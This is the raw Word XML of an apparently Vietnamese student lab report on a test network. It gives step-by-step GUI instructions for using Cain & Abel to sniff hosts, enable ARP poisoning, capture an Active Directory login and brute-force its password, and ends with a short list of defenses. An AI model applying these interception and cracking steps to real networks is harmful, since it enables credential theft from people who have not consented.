      <w:r w:rsidRPr="003E2EC9">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21596290" w14:textId="287B27C2" w:rsidR="003E2EC9" w:rsidRPr="003E2EC9" w:rsidRDefault="003E2EC9" w:rsidP="003E2EC9">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17B0F90C" wp14:editId="44C736B9">
            <wp:extent cx="4130040" cy="273973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33289" cy="27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6C1" w14:textId="77777777" w:rsidR="00BE702A" w:rsidRPr="00BE702A" w:rsidRDefault="00BE702A" w:rsidP="00BE702A">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15D6BA53" w14:textId="69B6D0FA" w:rsidR="003379A2" w:rsidRDefault="003379A2" w:rsidP="002B2C2B">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="257BE3F5" w14:textId="1CE4FF61" w:rsidR="003379A2" w:rsidRDefault="003379A2" w:rsidP="002B2C2B">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1825E9C2" w14:textId="01856FD4" w:rsidR="003379A2" w:rsidRDefault="003379A2" w:rsidP="002B2C2B">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771FBBE7" w14:textId="17788D59" w:rsidR="003379A2" w:rsidRDefault="003379A2" w:rsidP="002B2C2B">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D35B17" w14:textId="755A26F7" w:rsidR="003379A2" w:rsidRDefault="003379A2" w:rsidP="002B2C2B">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E95D8FA" w14:textId="75B1C369" w:rsidR="003379A2" w:rsidRDefault="003379A2" w:rsidP="002B2C2B">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FA2961F" w14:textId="5B65EA38" w:rsidR="003379A2" w:rsidRDefault="003379A2" w:rsidP="002B2C2B">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FD740B4" w14:textId="77777777" w:rsidR="003379A2" w:rsidRPr="002B2C2B" w:rsidRDefault="003379A2" w:rsidP="002B2C2B">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C25B6E1" w14:textId="77777777" w:rsidR="0045144B" w:rsidRPr="00281511" w:rsidRDefault="002B2C2B" w:rsidP="002B2C2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00281511">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sử dụng cain &amp; abel sniff và crack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7112653D" w14:textId="1E1AC31F" w:rsidR="002B2C2B" w:rsidRDefault="0045144B" w:rsidP="0045144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 wp14:anchorId="03BC5043" wp14:editId="763715D0">
            <wp:extent cx="3810000" cy="26289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C2B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>Thao tác như hình dưới &gt; chọn divice &gt; apply &gt; ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FE6277" w14:textId="05D41F0A" w:rsidR="002B2C2B" w:rsidRPr="002B2C2B" w:rsidRDefault="002B2C2B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ck to active sniffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061352F7" w14:textId="414262E5" w:rsidR="002B2C2B" w:rsidRDefault="002B2C2B" w:rsidP="002B2C2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B2066C6" wp14:editId="32855CB5">
            <wp:extent cx="4121727" cy="29983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1045" cy="30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E8C" w14:textId="24C1CC02" w:rsidR="002B2C2B" w:rsidRDefault="002B2C2B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hấn vào biểu tượng dấu + add to list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0D5485" w14:textId="3A4CCA4B" w:rsidR="002B2C2B" w:rsidRDefault="002B2C2B" w:rsidP="002B2C2B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4129CF93" wp14:editId="7C0D0EC5">
            <wp:extent cx="3800475" cy="18288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714B" w14:textId="74339B7A" w:rsidR="0045144B" w:rsidRDefault="0045144B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uyển qua tab Sniffer làm như hình dưới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792E0701" w14:textId="187550B0" w:rsidR="0045144B" w:rsidRDefault="0045144B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 wp14:anchorId="78045AFD" wp14:editId="258FCB41">
            <wp:extent cx="3075709" cy="2838286"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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84" cy="28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1BC5" w14:textId="650CFCAF" w:rsidR="0045144B" w:rsidRDefault="0045144B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Đã sniff thành công 3 địa chỉ ip đang kết nối</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E46A40F" w14:textId="785B9EF1" w:rsidR="00281511" w:rsidRDefault="00281511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92.168.12.4 (máy thật)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DED7238" w14:textId="0B909565" w:rsidR="00281511" w:rsidRDefault="00281511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92.168.12.2 (server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C00A20" w14:textId="2A74A8E8" w:rsidR="00281511" w:rsidRDefault="00281511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192.168.12.3 (máy client)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720DC936" w14:textId="493A1EE1" w:rsidR="0045144B" w:rsidRDefault="0045144B" w:rsidP="002B2C2B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38A02D05" wp14:editId="73EBF127">
            <wp:extent cx="3714750" cy="17811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8297" w14:textId="77777777" w:rsidR="00281511" w:rsidRDefault="00281511" w:rsidP="002B2C2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="094CD348" w14:textId="2F01C76E" w:rsidR="00281511" w:rsidRPr="00281511" w:rsidRDefault="00281511" w:rsidP="00281511">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00281511">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Crack mật khẩu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724C8200" w14:textId="7E77973E" w:rsidR="00281511" w:rsidRDefault="00281511" w:rsidP="00281511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àm theo thứ tự như hình để bắt gói tin từ 2 bên (server và client)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADF0005" w14:textId="7EEF06A3" w:rsidR="00281511" w:rsidRDefault="00281511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 wp14:anchorId="32DEA9F4" wp14:editId="011994DE">
            <wp:extent cx="3865418" cy="2533170"/>
            <wp:effectExtent l="0" t="0" r="1905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08" cy="25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99E8" w14:textId="5B725F07" w:rsidR="00281511" w:rsidRDefault="00281511" w:rsidP="002B2C2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="017E583C" w14:textId="55277374" w:rsidR="00281511" w:rsidRPr="00281511" w:rsidRDefault="00281511" w:rsidP="002B2C2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Đảm bảo </w:t>
      </w:r>
      <w:r w:rsidR="00422E20">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>APR đã được bật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB47239" w14:textId="3E9A5A6E" w:rsidR="00281511" w:rsidRDefault="00281511" w:rsidP="002B2C2B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27D3F95E" wp14:editId="0953D1B3">
            <wp:extent cx="4024745" cy="162623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6850" cy="1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063A" w14:textId="5F386791" w:rsidR="00422E20" w:rsidRDefault="00422E20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au khi bật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EA1732" w14:textId="46FA4E0A" w:rsidR="00422E20" w:rsidRDefault="00422E20" w:rsidP="002B2C2B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2212DE5C" wp14:editId="48E941EB">
            <wp:extent cx="2543175" cy="11430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16E" w14:textId="07440D21" w:rsidR="00422E20" w:rsidRPr="00422E20" w:rsidRDefault="00422E20" w:rsidP="00422E20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/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uyển qua </w:t>
      </w:r>
      <w:r w:rsidRPr="00422E20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>máy client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> log out &gt; đăng nhập bằng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tk active directory đã tạo tại server</w:t>
      </w:r>
      <w:r w:rsidRPr="00422E20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D153EB3" w14:textId="244CD856" w:rsidR="00422E20" w:rsidRPr="00422E20" w:rsidRDefault="00422E20" w:rsidP="00422E20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="331412D7" wp14:editId="220EBAB4">
            <wp:extent cx="4938757" cy="118456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57444" cy="11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trinhvanminh                     </w:t>
      </w:r>
      <w:r w:rsidRPr="00422E20">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00422E20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>username:minhtv</w:t>
      </w:r>
      <w:r w:rsidRPr="00422E20">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E903DA9" w14:textId="6A735EF7" w:rsidR="00422E20" w:rsidRDefault="00422E20" w:rsidP="002B2C2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EC3466D" wp14:editId="509B21FA">
            <wp:extent cx="3380509" cy="24056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96104" cy="24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2031" w14:textId="4B403CD7" w:rsidR="00422E20" w:rsidRDefault="00422E20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uyển sang tab password tại máy win xp (attacker) làm như hình bên dưới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4091890E" w14:textId="6DBFF6C3" w:rsidR="00422E20" w:rsidRDefault="00422E20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 wp14:anchorId="742B3924" wp14:editId="0E03E407">
            <wp:extent cx="3429000" cy="2482727"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="92" name="Picture 9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table, Excel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708" cy="24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9970" w14:textId="1CD7B82E" w:rsidR="00422E20" w:rsidRDefault="00422E20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uyển sang tab Cracker </w:t>
      </w:r>
      <w:r w:rsidR="00C86589">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt; 2 &gt; 3: chọn tất cả &gt; 4: chuột phải &gt; Brute-Force Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72135019" w14:textId="7B92A7B7" w:rsidR="00422E20" w:rsidRDefault="00422E20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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6507E89B" wp14:editId="0AA52096">
            <wp:extent cx="3373582" cy="2905431"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="93" name="Picture 9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, table, Excel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18" cy="29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21A6" w14:textId="7CFC6D6B" w:rsidR="008B20AC" w:rsidRDefault="008B20AC" w:rsidP="008B20AC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rute-Force Attack &gt; Chọn charset &gt; chọn đồ dài password &gt; Start </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFEACB6" w14:textId="04F7003F" w:rsidR="008B20AC" w:rsidRPr="008B20AC" w:rsidRDefault="008B20AC" w:rsidP="008B20AC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ssword sẽ hiển thì ở khung số 4 (nếu thành công)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E23C01C" w14:textId="37AF58E4" w:rsidR="00422E20" w:rsidRDefault="008B20AC" w:rsidP="002B2C2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="10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 wp14:anchorId="6B051929" wp14:editId="3DA324AB">
            <wp:extent cx="3139345" cy="2306782"/>
            <wp:effectExtent l="0" t="0" r="444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77" cy="23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00DD" w14:textId="77777777" w:rsidR="008B20AC" w:rsidRDefault="008B20AC" w:rsidP="002B2C2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="715A5803" w14:textId="77777777" w:rsidR="008B20AC" w:rsidRDefault="008B20AC" w:rsidP="002B2C2B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="449B7FF8" w14:textId="77777777" w:rsidR="008B20AC" w:rsidRDefault="008B20AC" w:rsidP="002B2C2B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5220AD98" w14:textId="77777777" w:rsidR="008B20AC" w:rsidRDefault="008B20AC" w:rsidP="002B2C2B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="703038A5" w14:textId="77777777" w:rsidR="008B20AC" w:rsidRDefault="008B20AC" w:rsidP="002B2C2B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="047DB679" w14:textId="77777777" w:rsidR="008B20AC" w:rsidRDefault="008B20AC" w:rsidP="002B2C2B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="020BF488" w14:textId="546C6B4B" w:rsidR="002B2C2B" w:rsidRDefault="002B2C2B" w:rsidP="002B2C2B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B2C2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Câu 5: Giải pháp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5D08D1" w14:textId="77777777" w:rsidR="008B20AC" w:rsidRPr="002B2C2B" w:rsidRDefault="008B20AC" w:rsidP="002B2C2B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D585DDC" w14:textId="6C5B169F" w:rsidR="002B2C2B" w:rsidRDefault="002B2C2B" w:rsidP="008B20AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="60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ật firewall, chỉ tắt ở những nơi tin tưởng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303F1ECD" w14:textId="7D7FBFC1" w:rsidR="002B2C2B" w:rsidRDefault="002B2C2B" w:rsidP="008B20AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="60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pdate phần mềm, hệ điều hành thường xuyên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EC41D5" w14:textId="7010ACF4" w:rsidR="002B2C2B" w:rsidRDefault="002B2C2B" w:rsidP="008B20AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="60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Thường xuyên kiểm tra các lỗi, các vurnerability bằng nessus để khắc phục</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC7F1A5" w14:textId="53058C10" w:rsidR="002B2C2B" w:rsidRDefault="002B2C2B" w:rsidP="008B20AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="60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uyển sang sử dụng hệ điều hành linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6769CCF0" w14:textId="38A60835" w:rsidR="002B2C2B" w:rsidRPr="002B2C2B" w:rsidRDefault="002B2C2B" w:rsidP="002B2C2B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B4FC745" w14:textId="77777777" w:rsidR="002B2C2B" w:rsidRPr="002B2C2B" w:rsidRDefault="002B2C2B" w:rsidP="002B2C2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="002B2C2B" w:rsidRPr="002B2C2B" w:rsidSect="00C7794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52B6" w14:textId="77777777" w:rsidR="006230A6" w:rsidRDefault="006230A6" w:rsidP="00413C64">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2991248E" w14:textId="77777777" w:rsidR="006230A6" w:rsidRDefault="006230A6" w:rsidP="0041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96C4" w14:textId="77777777" w:rsidR="006230A6" w:rsidRDefault="006230A6" w:rsidP="00413C64">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="65AC3426" w14:textId="77777777" w:rsidR="006230A6" w:rsidRDefault="006230A6" w:rsidP="0041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D28"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1702FA74"/>
    <w:lvl w:ilvl="0" w:tplc="FF6A32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87CCC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B816D3B2"/>
    <w:lvl w:ilvl="0" w:tplc="040450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C501D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="717AE16A"/>
    <w:lvl w:ilvl="0" w:tplc="D26C03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B1558"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA184BDC"/>
    <w:lvl w:ilvl="0" w:tplc="C9FA1DE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C0D08"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2526ACD8"/>
    <w:lvl w:ilvl="0" w:tplc="804088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269FB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BCE8929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B525EBB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="95C65B72"/>
    <w:lvl w:ilvl="0" w:tplc="2488C8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D32D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A9E9F04"/>
    <w:lvl w:ilvl="0" w:tplc="AC84E1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1772E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6E82CF1E"/>
    <w:lvl w:ilvl="0" w:tplc="F90E47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762B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D6FE501E"/>
    <w:lvl w:ilvl="0" w:tplc="A3C420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6643A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="68FE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7F55BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6756C602"/>
    <w:lvl w:ilvl="0" w:tplc="AFFCE1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13D8F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D8A6FEC4"/>
    <w:lvl w:ilvl="0" w:tplc="90D4A59C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9B0096"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EC4CE36C"/>
    <w:lvl w:ilvl="0" w:tplc="346ECE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4A"/>
    <w:rsid w:val="00006A23"/>
    <w:rsid w:val="00084D4A"/>
    <w:rsid w:val="000F4B74"/>
    <w:rsid w:val="001742BA"/>
    <w:rsid w:val="00191DE6"/>
    <w:rsid w:val="001C060A"/>
    <w:rsid w:val="00211298"/>
    <w:rsid w:val="00211A8A"/>
    <w:rsid w:val="00217AC7"/>
    <w:rsid w:val="002365D6"/>
    <w:rsid w:val="00281511"/>
    <w:rsid w:val="00295654"/>
    <w:rsid w:val="002B2C2B"/>
    <w:rsid w:val="002B6742"/>
    <w:rsid w:val="002D6AA7"/>
    <w:rsid w:val="003379A2"/>
    <w:rsid w:val="0034432F"/>
    <w:rsid w:val="00395FC6"/>
    <w:rsid w:val="003D321A"/>
    <w:rsid w:val="003E2EC9"/>
    <w:rsid w:val="00413C64"/>
    <w:rsid w:val="00422E20"/>
    <w:rsid w:val="0045144B"/>
    <w:rsid w:val="004A3141"/>
    <w:rsid w:val="004B63BB"/>
    <w:rsid w:val="004C07FE"/>
    <w:rsid w:val="004E6CD7"/>
    <w:rsid w:val="005959BF"/>
    <w:rsid w:val="005A529D"/>
    <w:rsid w:val="005B2426"/>
    <w:rsid w:val="005E3D8A"/>
    <w:rsid w:val="006230A6"/>
    <w:rsid w:val="00633DCE"/>
    <w:rsid w:val="00697DF9"/>
    <w:rsid w:val="006C0130"/>
    <w:rsid w:val="007504E3"/>
    <w:rsid w:val="007610A9"/>
    <w:rsid w:val="007A3D63"/>
    <w:rsid w:val="007B256B"/>
    <w:rsid w:val="007E357D"/>
    <w:rsid w:val="008109DB"/>
    <w:rsid w:val="008367D5"/>
    <w:rsid w:val="0086138C"/>
    <w:rsid w:val="008B20AC"/>
    <w:rsid w:val="008B261F"/>
    <w:rsid w:val="00A036E0"/>
    <w:rsid w:val="00A9002B"/>
    <w:rsid w:val="00AC44AC"/>
    <w:rsid w:val="00AD737A"/>
    <w:rsid w:val="00B02DC5"/>
    <w:rsid w:val="00B55D29"/>
    <w:rsid w:val="00B55F02"/>
    <w:rsid w:val="00BE702A"/>
    <w:rsid w:val="00C0060B"/>
    <w:rsid w:val="00C32115"/>
    <w:rsid w:val="00C3464D"/>
    <w:rsid w:val="00C54C6D"/>
    <w:rsid w:val="00C7794E"/>
    <w:rsid w:val="00C86589"/>
    <w:rsid w:val="00D50E85"/>
    <w:rsid w:val="00DC3512"/>
    <w:rsid w:val="00E80ED4"/>
    <w:rsid w:val="00F56AB3"/>
    <w:rsid w:val="00F87BEA"/>
    <w:rsid w:val="00F928FA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779D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{901C978A-889D-49CD-AA5A-6A0A44DD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A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4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4"/>
    <w:rPr>
      <w:noProof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BE7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hyperlink" Target="https://drive.google.com/u/0/uc?export=download&amp;confirm=PeDX&amp;id=13tWERPSCp7z-QKnbILHzl_eO1DBrEdXa&amp;fbclid=IwAR3Ox3hKiciuVZDGoCXjwgBW0JLDDPNZnp_0kvbKwQC67HwctKEtJh0ZhXU" TargetMode="External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yperlink" Target="https://www.tenable.com/downloads/nessus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7.jp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minh:8834/" TargetMode="External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microsoft.com/office/2007/relationships/hdphoto" Target="media/hdphoto1.wdp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03C-0AF2-497D-9DF6-704FAD52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9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MINH</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-12T07:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-18T09:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>